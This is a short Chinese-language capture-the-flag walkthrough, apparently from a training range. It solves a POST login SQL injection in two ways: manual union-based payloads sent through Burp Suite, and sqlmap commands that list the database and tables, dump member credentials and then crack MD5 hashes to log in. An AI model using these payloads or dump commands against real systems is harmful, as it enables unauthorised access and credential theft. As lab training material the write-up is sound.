第一种简单方法也是难理解的方法:
此题说是POST提交方式,所以我们需要用BP进行抓包
在登陆界面随便输入账号密码,可以看到下方图片红色框,抓到了
我们点击此页面使用快捷键ctrl+r,然后来到重放器界面
然后我们需要猜他的闭合方式
根据图片输入 ’ 发现页面报错了,那我们把 ’ 注释掉看看
页面显示正常
我们直接判断列数
‘ order by 4#
4错3对,说明有3列
联合查询
输入 ‘ union select 1,2,3#
直接获取到了KEY
第二种方法:
依旧是先抓包
然后把此页代码复制到桌面的文本里
保存文件
然后打开sqlmap,kali也行(自带sqlmap)
执行 python sqlmap.py -r 把文件拖到里面即可 –-batch
(我电脑里只有python3所以我输入python,多种环境的用python3执行)
执行如下命令:
python sqlmap.py -r C:\Users\sya\Desktop\23.txt --current-db –batch
查出当前数据库
执行命令
python sqlmap.py -r C:\Users\sya\Desktop\23.txt -D mozhe_Discuz_StormGroup --tables –batch
查出库中的表
执行命令如下命令查出列
python sqlmap.py -r C:\Users\sya\Desktop\23.txt -D mozhe_Discuz_StormGroup -T StormGroup_member –dump --batch
账号密码直接出来了
这里第一个用户密码被禁用了,直接用第二个就好了。但是这里密码用了md5加密,去网上随便找一个md5解密
登陆成功